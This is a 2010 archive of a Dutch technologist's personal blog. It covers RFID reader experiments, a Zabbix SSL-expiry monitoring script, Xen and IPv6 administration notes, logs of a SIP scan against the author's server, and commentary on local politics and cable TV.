News archive 2010 - Koos van den Hout

I just found out the tool I still use for safekeeping of passwords on my Palm Tungsten, strip was a really outdated version: 0.5 which had an irritating bug (editing an entry was the same as deleting it). But it still exists: Secure Tool for Remembering Important Passwords strip for the Palm. Upgraded to something newer and indeed the bug is gone.

Hopelijk nog net op tijd heb ik ook gereageerd op de Internetconsultatie wetsvoorstel versterking bestrijding computercriminaliteit.

Toch zou het bij een bezoek aan de gepubliceerde reacties op de Internetconsultatie wetsvoorstel versterking bestrijding computercriminaliteit alsof XS4ALL de enige is geweest die gereageerd heeft. In ieder geval is dat de enige gepubliceerde reactie.

Het lijkt alsof alle negatieve reacties niet gewaardeerd worden.
Bits of Freedom stelt:

Herinnert u zich nog het onzalige censuurvoorstel van oud-minister Hirsch Ballin waarmee websites zonder tussenkomst van de rechter uit de lucht konden worden gehaald? In de zomer van 2010 peilde het ministerie van Justitie via een internetconsultatie de reactie van belanghebbenden op dit plan. Nu – drie maanden na de sluiting – is nog steeds maar één reactie gepubliceerd. Als de overheid de internetconsultatie niet serieus neemt kunnen we haar maar beter afschaffen.

Bron: Overheid kan internetconsultatie maar beter afschaffen - Bits of Freedom
Update 2011-01-04 : Alle 609 reacties zijn nu gepubliceerd.

All the ski-passes we took home over the years are not readable for the 13.56 MHz RFID reader. According to EWcG AXESS in Ski Industry they are ISO 15693 tags which can be read at up to 50 cm, which suggests lower radio frequencies than 13.56 MHz. I checked tags from Portes du Soleil and Grand Massif. In Serfaus-Fiss-Ladis one returns the card at the end of the ski period to get the 5 euro deposit back.

Time to play a bit with the rfid reader, and trying the RFID IO tools by Adam Laurie.

Sofar the touchatag tags give an error from the tools:

koos@machiavelli:~/src/RFIDIOt-1.0a$ ./cardselect.py
cardselect v0.1l (using RFIDIOt v1.0a)
  Reader: PCSC ACS ACR122U 00 00

    PCSC Communications Error
Exception AttributeError: AttributeError("'NoneType' object has no attribute 'disconnect'",) in <bound method PCSCCardConnection.__del__ of <smartcard.pcsc.PCSCCardConnection.PCSCCardConnection instance at 0x95bb92c>> ignored

Where nfc-list sees these correct:

$ nfc-list
nfc-list use libnfc 1.4.0 (r833)
Connected to NFC device: ACS ACR122U 00 00 / ACR122U102 - PN532 v1.4 (0x07)
2 ISO14443A passive target(s) was found:
    ATQA (SENS_RES): 00  44  
       UID (NFCID1): 04  b7  cc  19  3e  25  80  
      SAK (SEL_RES): 00  

    ATQA (SENS_RES): 00  44  
       UID (NFCID1): 04  d8  10  19  3e  25  84  
      SAK (SEL_RES): 00  

But the cardselect error is the same when there is no tag at all. Time to try it with a card which is a bit more than just a UID. No dice, looks like some problem with the setup.

The tool lsnfc (part of nfc-utils) from nfc-tools does work:

koos@machiavelli:~/src/nfcutils-0.3.0$ ./src/lsnfc 
device = ACS ACR122U 00 00 / ACR122U102 - PN532 v1.4 (0x07)
UID=04b7cc193e2580
* NXP MIFARE UltraLight
UID=04d810193e2584
* NXP MIFARE UltraLight
2 tag(s) on device.

Two touchatag tags, indeed.

Time to schedule regular exports of my flickr data after reading this rant by Jason Scott:

Flickr.

I am, frankly a mixture of disappointed and sad that after Yahoo! shut down Geocities, Briefcase, Content Match, Mash, RSS Advertising, Yahoo! Live, Yahoo! 360, Yahoo! Pets, Yahoo Publisher, Yahoo! Podcasts, Yahoo! Music Store, Yahoo Photos, Yahoo! Design, Yahoo Auctions, Farechase, Yahoo Kickstart, MyWeb, WebJay, Yahoo! Directory France, Yahoo! Directory Spain, Yahoo! Directory Germany, Yahoo! Directory Italy, the enterprise business division, Inktomi, SpotM, Maven Networks, Direct Media Exchange, The All Seeing Eye, Yahoo! Tech, Paid Inclusion, Brickhouse, PayDirect, SearchMonkey, and Yahoo! Go!… there are still people out there going “Well, Yahoo certainly will never shut down Flickr, because _______________” where ______ is the sound of donkeys.

What, because they take your money? Because they’re so big? Because so many people use it and like it? Because it works well? Because it would make Yahoo! look bad? Go ahead, give me some more reasons. Flickr allows you great ability to export all your data. Get used to using it regularly.

Source: Yahoo!locaust - ASCII by Jason Scott.

Naast de bevestiging van de bestelling van de digitale ontvanger ook een tweede brief van Ziggo vandaag : per 1 februari 2011 gaat de prijs van het 'basisabonnement' met 50 cent omhoog, van 16.45 naar 16.95. Het 'basisabonnement' is gedefinieerd als het digitale basispakket (63 services SD, 4 HD) wat dan ook nog 30 kanalen analoog heeft (plus radio). Geen woord over wijzigingen van het analoge aanbod. Ik vraag me af hoe Ziggo de komende verandering aan het analoge aanbod gaat communiceren, redelijk kort na deze prijsverhoging.

Duidelijkheid van Ziggo over de toekomst van de analoge kanalen in Utrecht: het worden 24 kanalen (zie update: heeft nog status voorstel en concept) en BBC2, ZDF, ERT en TVE verdwijnen. Waarvan ik BBC2 toch niet wil missen. Ik zit er nu TopGear te kijken. Bron: Nu ook BBC2 en ZDF van kabel af - RTV Utrecht. Dus ben ik wel blij dat ik voor de aanbieding digitale ontvanger ben gegaan.
30 zenders nu, 24 per mei 2011, 4 die genoemd worden dat ze gaan verdwijnen. Ik mis nog wat informatie...
Update : In een reactie op Nu ook BBC2 en ZDF van kabel - dnu.nu over hetzelfde nieuws staat dat het besluit over het aantal kanalen nog niet definitief is (23 tot 25) en dat dit ook de status concept-advies heeft van de Utrechtse programma raad en nog niet definitief als advies naar Ziggo. En bij het goed nalezen van het artikel en het document zie ik dat ook Discovery en Animal Planet zouden wegvallen.

Ik krijg een beetje het gevoel dat de Utrechtse programmaraad wil voorkomen dat ze weer gezien wordt als oorzaak van het wegvallen van populaire zenders uit het analoge pakket en daarom maar eens gelijk naar buiten treed met een persbericht over plannen van Ziggo. En de website van de programmaraad Utrecht is weer eens niet bijgewerkt met dit bericht zodat het originele persbericht niet te lezen is, maar alleen berichten naar aanleiding van. Aan het bericht van dnu.nu hangt wel het concept-advies, dus daar is iets meer informatie uit te halen.
Update 2011-01-04 : Ik zie nu pas op de website van de programmaraad Utrecht het aangepaste advies staan. Het item is gedateerd op 10 december, maar rond 22 december zag ik dit er nog niet staan. De pdf is zo te zien 23 december aangemaakt en op de server gezet.

Redoing the IPv6 percentages visitors websites for November 2010:

• http://pictures.idefix.net/ pictures : 7%
• http://weather.idefix.net/ weather maps : 4%
• http://idefix.net/ my homepage : 4%
• http://netwerk.pcgg.nl/ hcc!pcgg netwerkgroep : 2%
• http://bbs.idefix.net/ BBS files : <1%
• http://webcam.idefix.net/ the webcam : <1%
• http://www.virtualbookcase.com/ The Virtual Bookcase : <1%
• http://www.camp-wireless.org/ Camp Wireless : <1%

SSL certificates are one of the more complicated things to keep an eye on: they work fine for 1, 2 or 3 years and suddenly all your users get confronted with very weird errors (which you want to be an error). So this is an ideal candidate for monitoring in zabbix. It is not a check which has to be done every 5 minutes, but even at every 12 hours (the zabbix maximum) I can get enough advance warning about a certificate which is going to expire. Using an external check and a simple script:

#!/usr/bin/perl -w

use strict;
use Date::Parse;

my ($host,$port) = ($ARGV[0],$ARGV[1]);

open(SSLINFO,"echo \"\" | openssl s_client -connect $host:$port 2>/dev/null | openssl x509 -enddate -noout 2>/dev/null |");

my $expiry=0;

while (<SSLINFO>){
        if (/^notAfter=(.+)\n$/){
                $expiry=str2time($1);
        }
}

if ($expiry>0){
        printf "%d\n",($expiry-time())/86400;
} else {
        print "0\n";
}

The port as parameter allows me to define multiple items, one for https and one for ldaps. The SSL on port 443 check calls external check ssl-expiry-left.monitor[443] which results in a call to /etc/zabbix/externalscripts/ssl-expiry-left.monitor server.dns.name 443. The first call to openssl is to connect to the service and request the certificate and the second one is to parse the certificate and fetch the enddate from the certificate.

I first tried to do this in seconds but three years worth of seconds gave problems. So all value fetching and testing had to be adjusted to work in days. We want an alert when there are less than 30 days left.

Interesting in the result display was that the expiry for some really fresh certificates is displayed as '1.06 kDays' (for 1060 days).

De gemeente Utrecht publiceert gewoon welke fietspaden in Utrecht gestrooid worden en inderdaad, de Troelstralaan waar ik in Januari 2010 last had van de sneeuw staat er niet op.

Blijkbaar blijft de gedachte: we strooien gegeven fietspaden, en niet de fietsroutes.

Almost winter holiday feeling: this morning it took over 15 minutes to dig the car out of the snow. It took a bit of searching to find a door to the car which would actually open, three were frozen. But I managed to open the car and get it moving. And traffic was slow, but doable. Finding a parking space where it would be possible to get out again was also 'interesting', and I hope I chose the right one...

Brilliant piece of film from 1963: "Snow" by director Geoffrey Jones when British Rail was still proud of being able to deal with all kinds of snow and kept the trains running better than cars.
Link via Winter's here - David Hembrow A view from the cycle path a recumbent rider (and builder) who views Dutch life with a UK background.

Ziggo had een aanbieding gestuurd voor een dvb-c receiver met smartcard. Zo te zien een Samsung DCB-B270R (zie update: niet zeker) en die heeft een feature die ik eigenlijk zeer prettig vind: als je gebruik maakt van een favorietenlijst kun je eigen nummers toekennen aan services. Zodat ik Discovery Channel op voorkeuze 11 kan zetten zoals ik altijd doe. De nummers binnen de 'zenderlijst' blijven wat Ziggo daarvan maakt, inclusief de rare sprongen. De nummers die ik gebruik zijn voor mijn gemak en niet voor dat van de marketing van de aanbieder, dus een ontvanger die me de optie geeft dat aan te passen vind ik wel prettig.

De reden dat dat aanbod nu komt (tot eind 2010) kan ik ook wel raden: volgens berichten gaat in april 2011 het analoge aanbod nog verder terug, naar 25 of zelfs 15 kanalen. De kans dat iets wat we graag kijken zoals Discovery of BBC dan er af gaat is dan redelijk groot.

Dus maar eens naar de Ziggo website en de hele zaak ingevuld dat we die digitale ontvanger willen. Maar dan moet ik een vinkje aanvinken: dat ik de voorwaarden voor automatische incasso accepteer. En automatische incasso wil ik niet, ik betaal Ziggo momenteel via een digitale nota en dat wil ik graag zo houden, ik hou graag controle over mijn geld. Dus maar eens de optie 'bel me terug' ingevuld. Alleen heeft dat op zaterdagmiddag niet het gewenste effect: onze telefoon gaat wel over maar ik krijg niemand van de verkoop te spreken, het gesprek valt gewoon na even weg. Maandag nog maar eens proberen.
Update 2010-12-20: Na nog wat mislukkingen van de 'bel me terug' optie maar eens zelf gebeld naar de klantenservice. Daar konden ze me prima helpen en de bestelling is genoteerd. Betaling gaat net als het gewone basis-abonnement, de settopbox is een Samsung of Cisco (grappig, ik zie bij ziggo geen Cisco SD settopbox..) afhankelijk van wat er in voorraad is. Ik ben dus benieuwd wat het gaat worden. Bevestigingsbrief binnen 5 dagen, levering binnen 2 weken.

Het valt me trouwens op dat ik via het web weinig vermelding van deze aanbieding kan vinden. Als je niet via bovenstaande url naar de ziggo site gaat krijg je de aanbieding ook gewoon niet te zien.
Update 2010-12-21: Het lijkt er op dat Ziggo overweegt per Mei 2011 naar 24 tot 26 analoge kanalen te gaan en de Utrechtse programmaraad een concept-advies heeft uitgebracht waarin inderdaad BBC 2 en Discovery wegvallen.
Update 2010-12-22: Volgens 'mijn ziggo' is de geplande levering van het 'Startpakket DTV' en de 'DTV ontvanger' tussen 24 en 29 december.
Update 2010-12-23: Keurig de bevestigingsbrief van de bestelling ontvangen.
Update 2011-01-01: Iemand heeft het nagevraagd: de hele aanbieding was niet te koop via winkels die ook Ziggo artikelen en diensten verkopen. En ondertussen heeft iemand die na mij het pakket besteld heeft het al binnen en wacht ik nog steeds.
Update 2011-01-06: Een doosje van Ziggo is geleverd. En de winnende inhoud is een Homecast Colorado HD. En deze heeft de goede optie: een favorietenlijst die je zelf kan sorteren. En in favorietenlijst-mode kun je via de volgnummers van de favorietenlijst zappen. Dus ik zet BBC 1 weer op 13 in plaats van 50. En zo'n favorietenlijst als zaplijst heeft nog een enorm voordeel: alle keuzepakket en premium kanalen die we niet hebben zet ik ook niet in de favorietenlijst, en die storen me dus niet bij het zappen.

Deze ontvanger is dus HD (compleet met HDMI uitgang..) en staat op de website van de leverancier voor 189 euro(!): Homecast - HD Colorado - stv kabel webshop

Eindelijk tijd om weer eens wat te schrijven. Met de regelmatige voedingen van mijn zoon heb ik beide handen natuurlijk vol. Maar soms is er ook maar een hand nodig, bijvoorbeeld om een poosje de speen vast te houden. Dus ik heb maar eens de FrogPad opgedoken die ik in 2004 heb aangeschaft. Nog niet zo veel mee gedaan maar nu heb ik een goede reden om maar met 1 hand te tiepen. Voor programmeren niet handig maar goed genoeg voor tiepen in irssi, news lezen in tin en mail lezen in mutt. Kan ik toch met een hand bijblijven!

In what I think is a brilliant move a number of British artists are doing a cover version of John Cage's experimental 4'33" piece to compete for the Christmas number one record. Having the number one position in the UK charts on Christmas is a really big deal (the movie Love Actually uses this fact which got a bit lost in translation for me when I first saw that movie). It competes with the winner of the UK X factor contest which got the number one position in recent years.

John Cage's 4'33" is exactly 4 minutes and 33 seconds of silence. Any number of instruments can not play in a performance of the composition.

• John Cage cover aims for Christmas No 1 with the sound of silence - The Guardian
• Stille kerstplaat moet Britse hitlijsten gaan veroveren - volkskrant.nl

Oh and one more thing:

I became a father on 3 december 2010 of a healthy son.

---

Ik ben vader geworden op 3 december 2010 van een gezonde zoon.

I received the touchatag rfid reader I ordered and started to play with it.

The touchatag is a ACS ACR122U.

First attempt: no go. I compiled libnfc and tried the test application:

$ ./nfc-list 
/home/koos/src/libnfc-1.3.9/examples/.libs/lt-nfc-list use libnfc 1.3.9 (r609)
lt-nfc-list: INFO: No device found.

A bit of searching found at last the problem in pcscd which does not like this particular reader:

00042283 ccid_usb.c:501:OpenUSBByName() Found Vendor/Product: 072F/2200 (ACS ACR122U PICC Interface)
00000009 ccid_usb.c:503:OpenUSBByName() Using USB bus/device: 005/022
00000006 ccid_usb.c:859:ccid_check_firmware() Firmware (1.00) is bogus! Upgrade the reader firmware or get a new reader.

I searched around and found the ACR122U drivers from the manufacturer ACS which include a linux pcsc driver. Compiled these and still got that same message. It took a bit of searching, but the file /usr/lib/pcsc/drivers/ifd-ccid.bundle/Contents/info.Plist lists the USB ids for which the ccid driver in libccid.so will be used, which includes 0x072F/0x2200. I removed this pair from the list, which is a bit of a hairy procedure as this is an xml file and the 'pair' is in two sets of strings. But then the ACS acsccid driver is used which works better:

nfc-list use libnfc 1.3.9 (r609)
Connected to NFC reader: ACS ACR122U 00 00 / ACR122U102 - PN532 v1.4 (0x07)
1 ISO14443A passive target(s) was found:
    ATQA (SENS_RES): 00  44  
       UID (NFCID1): 04  ac  12  91  21  25  80  
      SAK (SEL_RES): 00  

0 Felica (212 kbps) passive target(s) was found.

0 Felica (424 kbps) passive target(s) was found.

0 ISO14443B passive target(s) was found.

But this process is s-l-o-w with the ACS Linux 1.0.1 driver. With the 'beta' ACS 1.0.2 driver, this process is normal.

By the way: I indeed had tikitag/touchatag 04AC1291212580 on the reader.

Tick tock tick tock...

Time is running out for IPv4! Four additional /8s allocated in November 2010.

Something which bothered us at work for some time now is the weird habit of our Xen servers to report:

Error: (12, 'Cannot allocate memory')

Where we think there is enough (18G free at the moment) to allocate for a 512 Mb virtual machine. I searched high and low for this before but never found a working answer. With some other changes in the Xen cluster planned I was looking for answers again to this problem and found: Xen, HVM, and running out of memory which shows that the size of dom0 may be causing this. Asking Xen for memory info gives totally different numbers:

# xm info
..
total_memory           : 24570
free_memory            : 4

I guess the dom0 has somehow allocated those 18G in a way which Xen can't get back. Now to see whether adjusting dom0_mem will fix this...
Update: It took longer than expected because other parts of Xen acted up again, but the Xen cluster is available again with better memory allocation giving us a lot more space for virtual machine services.

# xm info
..
total_memory           : 24570
free_memory            : 14668

That is on the machine running most virtual machine services.

Good news, the website of xs4all is reachable via IPv6 now:

www.xs4all.nl has address 194.109.6.92
www.xs4all.nl has IPv6 address 2001:888:0:18::80

This means long work with load-balancers has finally resulted in something which can deal with the load and the wishes of xs4all.

My congratulations to xs4all and the people who made this possible!

This morning it was 2⁰C out in the shed as measured by the weather station. The computer is still running ok, according to smartmontools the current disk temperature is 22⁰C so that is still reasonable.

Ik hing vandaag (om hele goeie redenen) 3 kwartier aan de lijn met een 00800 nummer (international free phone, internationaal gratis nummer). Tijdens een deel van dat gesprek wat ik in de wacht hing vroeg ik me zo af wat dat nou de ontvanger zou kosten per minuut. Een simpele google zoekactie leverde vooral tarieven op voor het bellen naar 00800 nummers. Diverse mobiele aanbieders beweren namenlijk van harte dat het servicenummers zijn die 25 cent per minuut moeten kosten, o.a. Ben prepaid en Simyo. In de tarievenlijst van youfone eindeloos staat het volgens mij zelfs misleidend:

00800 servicenummers Tarief servicenummer + € 0,25 per minuut

Dat kan helemaal niet, want 00800 nummers hebben geen tarief. Maargoed, youfone haalt ook 084/087 en 085/088 door elkaar kwa tarieven (084 en 087 mag je servicenummers noemen, 085 zou gewoon tarief moeten zijn), dus die doen wel meer rare dingen.

In de tarieven voor KPN telefooncellen staat de uitleg

Je kunt ook 00800-nummers bellen. Dit zijn nummers die gebeld worden door mensen met een buitenlandse belkaart, waarvoor KPN geen kostenvergoeding ontvangt voor het gebruik van de telefooncel. Hiervoor geldt een tarief van € 0,10 per 29 seconden.

Enfin, uiteindelijk niet gevonden wat een 00800 gesprek nu de ontvanger zou kunnen kosten. Aangezien ik acuut iemand aan de lijn kreeg in North Carolina in de US, in de nachtdienst maar zeker met goede kennis van zaken zal het wel een aardig bedrag gekost hebben aan dat bedrijf.

My best guess is that the interesting ipv6 icmp traffic I mentioned before is part of the efforts of Akamai to build a 'performance map' of the IPv6 Internet, as mentioned in Akamai: Why our IPv6 upgrade is harder than Google's - Network World.

What we do in our mapping infrastructure is to build a performance map of the Internet. A lot of what we do for our content provider customers is provide superior performance by providing route optimization across the fabric of the 12,000 service providers that are the Internet.

So my old IPv6 nameserver address is part of this mapping effort. This traffic would stay under the radar if it wasn't the only traffic left on my old IPv6 tunnel link. My guess is based on the pattern in the addresses, and all whois records which give a detailed enough answer show Akamai.

Shednet with weatherstation

In the recent days I have been running the shednet computer again, this time with the conrad weather station attached. This is mainly for finding out what the climate in the shed is to help decide on hardware choices and setup.

The climate (in the shed) is different from what I expected: humidity is (so far) within limits of what the current PC (a Dell optiplex GX270) can handle. I expected humidity to become a problem before temperature. Temperatures are at the moment dropping below 'operating range' and a couple of cold days are coming up here in the Netherlands.

You can view the results at the weather station page but remember this is in the shed. Real measurements done with (something resembling) meteorological standards will be later.

But these measurements have learned me a few things and helped with a few decisions for the project sundial weather station:

• The humidity in the shed is not much of a problem.
• The temperature might be, but if a really low-power PC in an IP66 housing can survive an outdoor climate, it should survive in the shed.
• The conrad temperature sensor is not very precise in outdoor temperatures. So the 'outdoor' temperature / humidity will be measured using 1-wire sensors hooked up to the future weather station computer. The Netley Marsh 1 wire weather station has nice ideas and pictures how this can be done and a small 'sensor house' like the one they use would fit better in our back garden than a full-size Stevenson Screen (the official name of the white 'meteorological hut' which tries to shield thermometer and hygrometer from local influences).

The flickr picture is also some experimenting with the gimp.

Naar aanleiding van de berichtgeving over de bezwaren van inwoners van Utrecht tegen het opslaan van vingerafdrukken bij het aanvragen van een paspoort en de uitspraken over vingerafdrukken door Burgemeester Wolfsen van Utrecht die duidelijk niet gehinderd is door kennis van zaken heeft D66 Utrecht maar eens wat vragen gesteld aan het college van Burgemeester en Wethouders. Het artikel leest wat tam maar de schriftelijke vragen zelf zijn wat pittiger. Ik ben wel benieuwd naar de antwoorden.

Jammer dat D'66 Utrecht documenten publiceert in een gesloten en van een leverancier afhankelijk formaat. Met openoffice conversie gedaan naar pdf: 20101119_SV_bio_metrisch_paspoort_KV schriftelijke vragen D'66 Utrecht aan het college Burgemeesters en Wethouders van Utrecht inzake opslag bio-metrische gegevens in Paspoort en Databank.

I found out this week that the rfid card my employer uses to give out coffee is also a mifare classic card. Some searching on mifare related terms let me to Magna Carta and the name on the chipcard readers I see at work is also 'Magna Carta'. And another source told me that the touchatag reader can read mifare cards. I have played with touchatag tags before at the alcatel-lucent user conference.

I've been interested in rfid before, but the high cost of 'universal' (all rfid standards) readers were prohibitive. The touchatag is not a universal reader but gives me enough to begin with: For 30 euro I get a reader and some tags to play with, and the chance to read mifare cards such as the UU koffiekaart and the OV-chipkaart.

So I ordered the touchatag starter pack.
Update 2010-12-01: Nothing received other than a credit card statement, so I inquired about the state of the order.
Update 2010-12-02: On the same day a reply that the package was sent 2010-11-19.. and a package. Airmail wasn't was fast as expected...

Burgemeester Wolfsen van Utrecht doet wat uitspraken niet gehinderd door kennis van zaken in het lokale sufferdje:

Wat vindt burgemeester Wolfsen? “Vingerafdrukken zeggen in het geheel niets over iemands persoonlijkheid, dús zijn ze niet persoonlijk. Ook heb ik geen bezwaar tegen opslag in een centrale databank. Dat helpt dure fraude en misbruik te voorkomen.

met nog een mooie afsluiter die ik ook 'een beetje dom' zou willen noemen:

En vreest de burgemeester ook niet, zoals veel bezwaarmakers, misbruik van de gegevens, te meer daar het systeem misschien door het Franse wapenbedrijf MORPHO wordt gebouwd? “Wié een systeem bouwt, lijkt me niet relevant. Het gaat om het gebruik ervan. En een goede beveiliging is inderdaad cruciaal.” Hij voegt hieraan toe: “We moeten ervan uitgaan dat dat op rijksniveau in orde is.”

Bron: stadsblad Utrecht 17 november 2010 (PDF formaat).

Alleen dankzij de moderne techniek kan iedereen meegenieten en er vrolijk over twitteren enzo.

RTV Utrecht reageert nog uitermate lief:

Uitspraken van Wolfsen over een vingerafdrukkendatabase in het Stadsblad hebben voor ophef gezorgd. In diverse media wordt de burgemeester van Utrecht van naïviteit beschuldigd.

Bron: Ophef uitspraken Wolfsen over vingerafdruk.

Ik hou het maar op 'een beetje dom'. Van een burgemeester zou ik iets meer wetskennis verwacht hebben.

I installed a Digi CM console server today and the initial setup has two approaches:

From the CD, run the Advance Device Discovery Protocol application to locate the Digi CM on the network. In firmware 1.8 and greater, the CM has SNMP, SSHv1, and Telnet to the command line disabled by default, and http is automatically redirected to https. To perform initial device configuration, use the discovery tool on the CD

or ..

Are you a POWER USER? Use the configuration menu: 1. Establish a serial connection through the console port (9600, 8, N, 1). 2. Login as root and password dbps. 3. Type the command configmenu. Select option 1 - Network Configuration and follow the prompts.

Hardware with the bofh nature. I like it.

Politiek is een mooi vak, daar kan James Sharpe beweren:

"Ik heb niets te verbergen."

direct gevolgd door

"Maar ik zie al voor me dat allerlei exen van alles over mij gaan vertellen."

zonder dat de verslaggever eens flink doorzaagt over de tegenstelling die hier staat.

Bron: Wilders respecteert vertrek PVV'er Sharpe - NOS Nieuws

Another solution for fixing the over-eager IntelliPark feature of Western Digital 'Caviar green' disks: Robert Waldner has documented where to get the WD util which sets a more usable parking time and how to build a freedos disk from linux.

I had this issue in a disk in the homeserver greenblatt before but I have a disk which listens to hdparm -B.

Eneco prutst vrolijk verder en stuurt de reclame voor een speciale aanbieding voor klanten via een andere e-mail verzender spammer dan de mail over de betalingen.

Ik kreeg vanmiddag mail over een besparende wasbol en de links daar in zijn ook weer van het tracking type:

Wilt u geen berichten meer ontvangen van Eneco, meld u dan hier af:
http://mail.eneco.nl/2/3fde84dda3a1....

Maar dat is weer een andere spammer:

$ host mail.eneco.nl
mail.eneco.nl is an alias for myclang.com.
myclang.com has address 217.148.80.240
myclang.com mail is handled by 10 mail.e-village.nl.
myclang.com mail is handled by 20 mail1.e-village.nl.
myclang.com mail is handled by 30 mail2.e-village.nl.

En volgens mijn 'contactprofiel' bij Eneco wil ik helemaal niet "Informatie over gewijzigde tarieven, producten en diensten van Eneco" via e-mail. Maar het kopje 'Aanbiedingen' is apart en daar was nog niets ingevuld (wat blijkbaar gezien wordt als toestemming). Dat is vast omdat het kopje 'Aanbiedingen' er nog niet was toen ik invulde dat ik "informatie" via de post wilde. Het is misschien achterhaald volgens TNT post maar ik vind het wel prettig als er een prijskaartje hangt aan het mij op de hoogte stellen van nieuwe aanbiedingen.

In september 2009 klaagde ik over de misleidende links van eneco in hun e-mail. Ineens viel het me op dat er in een mailtje van vanmorgen staat:

Direct mijn nota betalen                                                        
http://e-mail.eneco.nl/public/r/4AFPAujKQ.....

dat lijkt via eneco te gaan. Maar de link lijkt wel erg op zo'n tripolis tracking link. Dat klopt ook bij nadere controle:

$ host e-mail.eneco.nl
e-mail.eneco.nl is an alias for veritate.tripolis.com.
veritate.tripolis.com has address 80.69.72.81
veritate.tripolis.com mail is handled by 100 mx2.dialogue.tripolis.com.
veritate.tripolis.com mail is handled by 100 mx1.dialogue.tripolis.com.

Nee, nogsteeds niet veilig om op te klikken. En nog misleidender eigenlijk, het lijkt nu onder controle van eneco maar dat is het niet.

Bij nazoeken blijkt dit in Juli 2010 ingegaan te zijn. Ik vermoed dat enige overeenkomst met wanneer Thunderbird ging melden 'this message may be a scam' bij links die helemaal niet kloppen met de linktekst (type <a href="http://site.domain1..">http://anderesite.anderdomain/..</a>) er misschien iets mee te maken had.

Mijn alarm voor 'scam' gaat nogsteeds af, nu nog harder nu ze de externe invloed proberen te maskeren.

Another SIP scan and traffic flood going on, this time from 84.124.101.65. It started like all the others:

[2010-11-14 07:05:40] NOTICE[6576] chan_sip.c: Registration from '"728107069"<sip:728107069@mm.nn.oo.pp>' failed for '84.124.101.65' - No matching peer found
[2010-11-14 07:05:40] NOTICE[6576] chan_sip.c: Registration from '"3220398202"<sip:3220398202@mm.nn.oo.pp>' failed for '84.124.101.65' - No matching peer found
[2010-11-14 07:05:47] NOTICE[6576] chan_sip.c: Registration from '"728107069" <sip:728107069@mm.nn.oo.pp>' failed for '84.124.101.65' - No matching peer found
[2010-11-14 07:06:13] NOTICE[6576] chan_sip.c: Registration from '"728107069" <sip:728107069@mm.nn.oo.pp>' failed for '84.124.101.65' - No matching peer found
[2010-11-14 07:06:13] NOTICE[6576] chan_sip.c: Registration from '"728107069" <sip:728107069@mm.nn.oo.pp>' failed for '84.124.101.65' - No matching peer found
[2010-11-14 07:06:13] NOTICE[6576] chan_sip.c: Registration from '"728107069" <sip:728107069@mm.nn.oo.pp>' failed for '84.124.101.65' - No matching peer found
[2010-11-14 07:06:13] NOTICE[6576] chan_sip.c: Registration from '"728107069" <sip:728107069@mm.nn.oo.pp>' failed for '84.124.101.65' - No matching peer found
[2010-11-14 07:06:13] NOTICE[6576] chan_sip.c: Registration from '"728107069" <sip:728107069@mm.nn.oo.pp>' failed for '84.124.101.65' - No matching peer found
[2010-11-14 07:06:13] NOTICE[6576] chan_sip.c: Registration from '"728107069" <sip:728107069@mm.nn.oo.pp>' failed for '84.124.101.65' - No matching peer found

And fail2ban picked it up soon. But it is still active, causing delays for me.
SIP packet:

        Via: SIP/2.0/UDP 192.168.130.65:5070;branch=z9hG4bK-3016029746;rport
            Transport: UDP
            Sent-by Address: 192.168.130.65
            Sent-by port: 5070
            Branch: z9hG4bK-3016029746
            RPort: rport
        Content-Length: 0
        From: "728107069" <sip:728107069@mm.nn.oo.pp>
            SIP Display info: "728107069" 
            SIP from address: sip:728107069@mm.nn.oo.pp
        Accept: application/sdp
        User-Agent: friendly-scanner
        To: "728107069" <sip:728107069@mm.nn.oo.pp>
            SIP Display info: "728107069" 
            SIP to address: sip:728107069@mm.nn.oo.pp
        Contact: sip:123@84.124.101.65:42529
            Contact Binding: sip:123@84.124.101.65:42529
                URI: sip:123@84.124.101.65:42529\r
                    SIP contact address: sip:123@84.124.101.65:42529\r
        CSeq: 1 REGISTER
            Sequence Number: 1
            Method: REGISTER
        Call-ID: 3948668237
        Max-Forwards: 70

The traffic through the old IPv6 tunnel has picked up again, strangely enough. Lots of pings, with an interesting pattern:

22:48:16.386678 IP6 2001:44b8:4020::3ba7:c00d > old-greenblatt.idefix.net: ICMP6, echo request, seq 2551, length 64
22:48:43.153243 IP6 2001:418:2007::c611:f352 > old-greenblatt.idefix.net: ICMP6, echo request, seq 33555, length 64
22:48:47.752944 IP6 2001:559:0:300::6011:9036 > old-greenblatt.idefix.net: ICMP6, echo request, seq 14673, length 64
22:48:48.155782 IP6 2001:559:0:300::6011:9023 > old-greenblatt.idefix.net: ICMP6, echo request, seq 43716, length 64
22:48:55.208693 IP6 2001:450:2025::40d0:a419 > old-greenblatt.idefix.net: ICMP6, echo request, seq 19418, length 64
22:48:57.628638 IP6 2001:418:3808:100::48f7:2e6f > old-greenblatt.idefix.net: ICMP6, echo request, seq 51787, length 64
22:50:36.220974 IP6 2001:418:8404::cc02:a0b7 > old-greenblatt.idefix.net: ICMP6, echo request, seq 27196, length 64
22:50:47.102088 IP6 2001:418:4001:3::c657:b0c5 > old-greenblatt.idefix.net: ICMP6, echo request, seq 50291, length 64
22:50:56.675730 IP6 2001:590:0:2::d8f6:7acf > old-greenblatt.idefix.net: ICMP6, echo request, seq 19017, length 64
22:51:16.323368 IP6 2001:44b8:4020::3ba7:c00d > old-greenblatt.idefix.net: ICMP6, echo request, seq 38769, length 64
22:51:43.154029 IP6 2001:418:2007::c611:f352 > old-greenblatt.idefix.net: ICMP6, echo request, seq 14674, length 64
22:51:47.755011 IP6 2001:559:0:300::6011:9036 > old-greenblatt.idefix.net: ICMP6, echo request, seq 61327, length 64
22:51:48.168141 IP6 2001:559:0:300::6011:9023 > old-greenblatt.idefix.net: ICMP6, echo request, seq 24579, length 64

All source addresses have bits 65-96 set to 0. When I translate those to IPv4 addresses I get valid addresses (duh) which for example in the case of 2001:418:2007::c611:f352 map to the same organisation (NTT America). So I guess some type of dual-stack host is causing this, with all the same software setup. Some kind of global network probe is learning the 2001:888:1011::694 from somewhere.

I don't see this as 'wrong', it's just interesting. Why is something still using this old address.

With all the interesting weather today on the Northsea I added the Northsea area at weather.idefix.net with fresh weather maps every hour.

Interesting weather happening, windspeed Northsea reported at 24 meter/second with 29 meter/second gusts (87 and 105 kilometer per hour).
Update 15:10 EHKV reporting ///42G64KT wind (78 kilometer per hour sustained, 119 kilometer per hour gust). Wind without direction isn't parsed correctly by Geo::METAR so the weather.idefix.net plot for 15:00 CET has no wind for EHKV.
Update Geo::METAR local version updated, /// is 'measurement broken'. But the plotscript still can't draw a windvane for that measurement.
